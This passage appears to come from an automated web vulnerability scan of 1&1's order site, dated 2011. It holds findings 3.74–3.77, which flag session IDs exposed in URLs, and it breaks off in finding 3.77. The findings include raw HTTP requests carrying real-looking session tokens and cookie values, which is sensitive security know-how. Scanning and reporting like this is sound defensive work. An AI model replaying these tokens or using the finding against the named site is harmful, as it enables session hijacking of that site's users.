<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Hosting&amp;linkOrigin=Hosting&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Hosting&amp;page=switch&amp;linkOrigin=Hosting&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.tab.microsofthosting" rel="button-hd-tab-microsofthosting"><span>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Microsoft<br>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Service &amp; Support</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/FirstWebsite;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">First Website</a>
...[SNIP]...
<li><a rel="height=480, width=665" class="window-open core_button_normal" href="/xml/order/Moneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
90-Day Guarantee
</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">International Customers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">News</a>
...[SNIP]...
</h4><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;origin.page=Hosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on"><img src="/oneandone_en_common/img/frontend-hosting/teaser/teaser_ngh.png" alt="" class="alphapng" title="1&amp;1 MyBusiness Site" width="112" height="70">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;origin.page=Hosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on">


Details
</a>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-beginner-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-home-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-developer-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-beginner-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-home-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-developer-package-bundle"><span>
...[SNIP]...
<td class="feature-banner" colspan="5"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=590,screenX=100,screenY=100');" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static"><img src="/common/img/components/hosting/vis_softwarebundle.png" alt="Adobe Dreamweaver" class="software alphapng" width="98" height="66">
...[SNIP]...
<td class="feature-banner-link" colspan="5"><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">New Features for Windows&reg; packages</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Included Domains
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Private Domain Registration
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDns;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
DNS Management
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Webspace Explorer
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Control Panel
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebDatabase
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
E-mail Accounts
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebMail 2.0
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailVirusscan;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Spam Filter
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Adobe&reg; Dreamweaver&reg; CS4</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">NetObjects Fusion&reg; 1&amp;1 Edition</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Click-n-Build Applications
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebsiteBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
DynamicSiteCreator
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Photo Gallery
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Spreadshirt Merchandising
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
iStockphoto image library
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 FormBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingContentmoduls;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Dynamic Content Catalog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Maps
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDriving;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Directions
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Ready-to-Run CGI Library
</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureToolsRatepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
RatePoint
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Google&#8482; AdWords**
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Citysearch&reg;
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrSesub;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Simple Submission
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 SiteAnalytics
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">1&amp;1 Downloadable Green Logo </a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMailinglist;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Mailing List
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Blog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsNewsletter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 E-mail Marketing Tool
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingRss;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Easy RSS
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Chat Channels
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsDialogue;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
In2site Live Dialogue
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSecurityCertificate;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
GeoTrust Dedicated SSL Certificate
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
90-Day Money Back Guarantee
</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p>** See <a rel="height=350, width=665" class="window-open" href="/xml/order/popupTcGoogleAdwords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">T&amp;C</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Hosting&amp;linkOrigin=Hosting&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.74. http://order.1and1.com/xml/order/Instant

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:23:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Instant?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain


3.75. http://order.1and1.com/xml/order/International

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/International;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:38:04 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/International?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.76. http://order.1and1.com/xml/order/Jumpto

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkId=hd.log.eue&site=PU.WH.US&origin.page=Home&linkOrigin=Home&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:22:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Jumpto?__frame=_top&__lf=Static&linkId=hd.log.eue&site=PU.WH.US&origin.page=Home&linkOrigin=Home&linkId=hd.log.eue
Content-Length: 0
Connection: close
Content-Type: text/plain


3.77. http://order.1and1.com/xml/order/LocalSubmission

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

